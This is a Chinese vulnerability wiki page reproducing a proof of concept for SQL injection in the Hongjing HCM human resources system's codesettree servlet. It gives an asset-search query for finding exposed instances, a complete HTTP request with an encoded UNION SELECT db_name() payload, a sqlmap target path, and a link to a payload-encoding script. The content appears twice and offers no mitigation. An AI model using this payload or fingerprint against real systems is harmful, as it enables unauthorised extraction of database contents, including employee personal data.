fofamini-wiki

登录白背景

源码

宏景人力资源信息管理系统codesettree存在SQL注入漏洞

一、漏洞简介

宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统codesettree存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

宏景人力资源信息管理系统

三、资产测绘

hunterapp.name="宏景 HCM"
特征

四、漏洞复现

GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=1&categories=~31~27~20union~20all~20select~20~27~31~27~2cdb~5fname~28~29~2d~2d~20 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=201281DC1EF63C7855CA781A710216C3
Connection: close

sqlmap

/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=1&categories=1

ehrSafeCodeEncode.py

原文: https://www.yuque.com/xiaokp7/ocvun2/kwrfvlgbwggadvu4

# 宏景人力资源信息管理系统codesettree存在SQL注入漏洞

# 一、漏洞简介
宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统codesettree存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 宏景人力资源信息管理系统

# 三、资产测绘

- hunter`app.name="宏景 HCM"`
- 特征

![image.png](./img/7iP491-gsDVgx3kt/1702368984886-bd83145b-caba-4fdc-9916-c5473e122d40-295477.png)

# 四、漏洞复现
```
GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=1&categories=~31~27~20union~20all~20select~20~27~31~27~2cdb~5fname~28~29~2d~2d~20 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=201281DC1EF63C7855CA781A710216C3
Connection: close
```
![image.png](./img/7iP491-gsDVgx3kt/1707134618882-13eaa59a-0278-45c1-a4e5-283beae22111-940122.png)
sqlmap
```
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=1&categories=1
```
[ehrSafeCodeEncode.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709219600967-6478be9c-37c7-4906-b297-76aff049ed27.py?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fpy%2F1622799%2F1709219600967-6478be9c-37c7-4906-b297-76aff049ed27.py%22%2C%22name%22%3A%22ehrSafeCodeEncode.py%22%2C%22size%22%3A730%2C%22ext%22%3A%22py%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u3f44aef8-c69e-4aee-96a6-40b5f7d5bad%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22text%2Fx-python-script%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u6f25a792%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
![image.png](./img/7iP491-gsDVgx3kt/1707134666469-911739d1-f934-4b75-8a98-bc83a859bcbf-395447.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kwrfvlgbwggadvu4>